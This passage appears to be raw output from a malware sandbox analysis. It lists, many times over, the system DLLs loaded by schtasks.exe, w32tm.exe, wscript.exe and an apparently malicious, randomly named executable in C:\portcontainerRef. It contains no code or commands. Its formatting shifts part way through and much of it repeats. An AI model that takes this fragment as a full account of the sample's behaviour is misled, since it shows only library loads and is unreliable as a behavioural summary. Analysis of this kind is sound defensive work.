            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: amsi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: propsys.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: edputil.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: netutils.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: slc.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sppc.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasman.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: amsi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: userenv.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wbemcomn.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iphlpapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dnsapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc6.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winnsi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: propsys.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: edputil.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: urlmon.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iertutil.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: srvcli.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: netutils.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: policymanager.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: msvcp110_win.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasapi32.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasman.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rtutils.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wintypes.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: appresolver.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: bcp47langs.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: slc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sppc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mswsock.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winhttp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasadhlp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: fwpuclnt.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: uxtheme.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: windows.storage.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: wldp.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: profapi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: cryptsp.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rsaenh.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: cryptbase.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: sspicli.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: amsi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: userenv.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: wbemcomn.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: iphlpapi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: dnsapi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: dhcpcsvc6.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: dhcpcsvc.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: winnsi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: propsys.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: edputil.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: urlmon.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: iertutil.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: srvcli.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: netutils.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rasapi32.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rasman.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rtutils.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: mswsock.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: winhttp.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: policymanager.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: msvcp110_win.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: wintypes.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: appresolver.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: bcp47langs.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: slc.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: sppc.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rasadhlp.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: fwpuclnt.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: mscoree.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: kernel.appcore.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: version.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: vcruntime140_clr0400.dll
